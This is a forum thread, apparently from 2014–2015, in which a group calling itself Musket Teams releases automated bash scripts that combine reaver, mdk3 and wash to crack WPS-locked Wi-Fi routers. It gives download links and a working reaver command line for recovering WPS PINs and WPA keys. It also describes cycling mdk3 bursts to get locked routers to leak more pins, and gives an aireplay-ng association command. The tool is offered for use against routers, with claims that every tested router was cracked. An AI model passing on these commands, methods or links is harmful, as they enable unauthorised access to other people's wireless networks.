musketteams Posted November 15, 2014 Share Posted November 15, 2014 Musket Teams have completed the latest WPS Locked intrusion script using reaver,mdk3 and wash in a automated process This approach works on some routers. The program can be used for normal reaver operations as well. The VMR-MDK009.zip file contains 1. VMR-MDK009i.sh script 2. VMR-MDK009j.sh script (untested see bcomments in help file) 3. Introductory help files 4. VARMAC_CONFIG folder containing 1. maclistreavermdkvar1 2. configtemplate1 3. configtemplate2 4. configtemplate3 5 configtemplate4 6. configtemplate5 Download VMR-MDK009.zip at http://www.axifile.com/en/5C34EBC933 Quote Link to comment Share on other sites More sharing options...
ZaraByte Posted November 15, 2014 Share Posted November 15, 2014 Explain more about this. Quote Link to comment Share on other sites More sharing options...
musketteams Posted November 16, 2014 Author Share Posted November 16, 2014 (edited) Since you asked here is a short history Soxrox212 started this with his note of alternative mdk3 approaches to reset routers in kali-linux forums MTeams tried all sorts of combinations but got nowhere. Later The author of autoreaver noted in his bash program for BT5R3 that the following reaver command line worked well against routers having weak realative strength (i.e. RSSI) reaver -i mon0 -a -b 55:44:33:22:11:00 -r 3:15 -E -S -vv -N -T 1 -t 20 -d 0 -x 30 See https://forums.kali.org/showthread.php?22446-A-reaver-command-line-for-routers-at-long-range-or-routers-responding-erratically&highlight=reaver+99.99%25 Musket Teams began experimenting with this command line and discovered that routers showing an unlocked WPS state that responded poorly to simple reaver command lines, could be induced to give up WPS Pins with the above command. MTeams also discovered that if the router ran up to 99.99% and spun at that number, if you reset the reaver command line in a certain way, the WPS pin and WPA key was provided in one iteration from reaver. Go here for the steps: https://forums.kali.org/showthread.php?22507-Cracking-6C-19-8F-D-Link-Router-with-reaver-and-defeating-the-99-99-problem&highlight=reaver+99.99%25 MTeams turned their attention to WPS Locked routers and discovered that some routers showing a WPS locked state gave up pins and then locked. Furthermore, if subjected to combinations of mdk3, the router would giveup more pins. Hence you could collect pins, hit the router with a short burst of mdk3, then pause, and then collect pins again in an endless cycle. This required an automated script and is far more complex then noted here, as it is a balancing act between reaver - mdk3 attack type - router recovery time From this, the scripts above were written. With this download there are long help files in a text file and also embedded in the primary config file. You have the history. Go to the help files for more details. In closing this does not work with all routers. But a short test will tell you if the router is susceptible. Musket Team Edited November 16, 2014 by musketteams Quote Link to comment Share on other sites More sharing options...
ZaraByte Posted November 16, 2014 Share Posted November 16, 2014 Meh tested this against a Comcast Router failed to associate i think its due to the fact that comcast routers are push button :D and or they need to add like a replay-ng to make it associate to the router that way. Quote Link to comment Share on other sites More sharing options...
musketteams Posted November 17, 2014 Author Share Posted November 17, 2014 (edited) Mteams can add any additional Eterm modules you rqr. We are not sure what you mean by replay-ng. Do you mean? aireplay-ng -1. If you mean aireplay-ng -1 you can test this. Run the script on the channel of the target, do not use channel hopping then open a terminal window and type in aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX mon0 Set the LIVE1 variable at least 300 seconds or more to give you time to test. The problem with aireplay-ng is that if it doesnot get association with the router quickly it terminates. It also doesnot like channel hopping. We corresponded with aircrack-ng trying to find a way to keep aireplay-ng live but the solutions they suggested did not work. You can find this correspondence in the aircrack-ng forums In our areas of operation we do not have any problem with association so it is difficult for us to develop a program that we cannot actually test. Edited November 17, 2014 by musketteams Quote Link to comment Share on other sites More sharing options...
ZaraByte Posted November 17, 2014 Share Posted November 17, 2014 Mteams can add any additional Eterm modules you rqr. We are not sure what you mean by replay-ng. Do you mean? aireplay-ng -1. If you mean aireplay-ng -1 you can test this. Run the script on the channel of the target, do not use channel hopping then open a terminal window and type in aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX mon0 Set the LIVE1 variable at least 300 seconds or more to give you time to test. The problem with aireplay-ng is that if it doesnot get association with the router quickly it terminates. It also doesnot like channel hopping. We corresponded with aircrack-ng trying to find a way to keep aireplay-ng live but the solutions they suggested did not work. You can find this correspondence in the aircrack-ng forums In our areas of operation we do not have any problem with association so it is difficult for us to develop a program that we cannot actually test. https://code.google.com/p/reaver-wps/issues/detail?id=205 comment #7 some people claim your too far from the router Quote Link to comment Share on other sites More sharing options...
musketteams Posted December 12, 2014 Author Share Posted December 12, 2014 The previous hosting site has stoped functioning You can download varmacreaversav99-3.zip at: http://www.datafilehost.com/d/88864143 You can download VMR-MDK009.zip at http://www.datafilehost.com/d/ec0c478c MTeams Quote Link to comment Share on other sites More sharing options...
musketteams Posted January 7, 2015 Author Share Posted January 7, 2015 (edited) The following VMR-MDK009x2.sh has been written to take advantage of a flaw in some WPs locked routers allowing the collection of pins even though reaver and wash show the router is locked. The downloaded includes extensive helpfiles and has been tested against numerous routers showing this flaw. All were cracked. Also included in the help files is how to handle the 99.99% problem which occurs in almost half of the successful attacks against routers providing small numbers of pins when the WPS system is locked. Reference the download VMR-MDK009x2.sh We have found an error in one configuration file named: configfiledetailed1x2 You can REM/COMMENT out with a # the following two(2) variables USE_PIN1= should read #USE_PIN1=WPS_PIN1= should read #WPS_PIN1= or you can download the corrected version New Download package VMRMDK150108 http://www.datafilehost.com/d/18156813 Musket Teams Edited January 8, 2015 by musketteams Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.